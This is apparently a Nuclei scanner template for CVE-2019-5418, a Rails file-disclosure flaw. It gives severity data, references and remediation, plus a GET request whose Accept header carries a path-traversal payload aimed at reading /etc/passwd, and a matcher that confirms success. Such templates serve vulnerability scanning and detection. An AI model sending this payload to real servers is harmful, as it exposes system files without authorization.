id: CVE-2019-5418 info: name: Rails File Content Disclosure author: omarkurt severity: high description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. impact: | This vulnerability can lead to unauthorized access to sensitive information stored on the server. remediation: | Apply the patch provided by the Rails team or upgrade to a version that includes the fix. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2019-5418 - https://www.exploit-db.com/exploits/46585/ - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-5418 cwe-id: CWE-22,NVD-CWE-noinfo epss-score: 0.97426 epss-percentile: 0.99937 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails product: rails shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails http: - method: GET path: - "{{BaseURL}}" headers: Accept: ../../../../../../../../etc/passwd{{ matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 - 500 # digest: 4a0a00473045022100978816b4fb1458a04599231818b47a14af8f789c0ee6102bb6be99b7b6f287af022020b6956335919b9d3db992623cbd2b30902fb32cc20e64bd1a6ba7c91404dd63:922c64590222798bb761d5b6d8e72950